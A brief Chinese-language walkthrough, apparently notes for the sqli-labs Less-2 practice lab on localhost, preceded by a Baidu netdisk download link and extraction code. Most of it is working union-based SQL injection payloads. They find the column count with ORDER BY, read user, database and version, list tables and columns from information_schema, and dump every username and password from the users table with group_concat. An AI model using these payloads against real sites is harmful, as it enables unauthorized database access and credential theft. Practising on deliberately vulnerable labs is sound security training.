链接:https://pan.baidu.com/s/1-QIYmAU-BV_DEONfxovizQ
提取码:dc66
分析表有多少列(通过order by 列数 不断尝试,直到报错为止),如下图判断出该表有三列
通过将id赋为错误的数据将sql左侧的数据屏蔽,后面可以根据系统自带的信息来进行分析
通过 select user()用户信息 database()数据库 version()版本
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where TABLE_SCHEMA=database()
通过系统自带函数information_schema.COLUMNS
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.COLUMNS where TABLE_SCHEMA=database() and TABLE_NAME='users'
已知表中字段,通过group_concat获取表中列的所有信息(0x3a为16进制的冒号,作为显示分隔使用)
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(username,0x3a,password),3 from users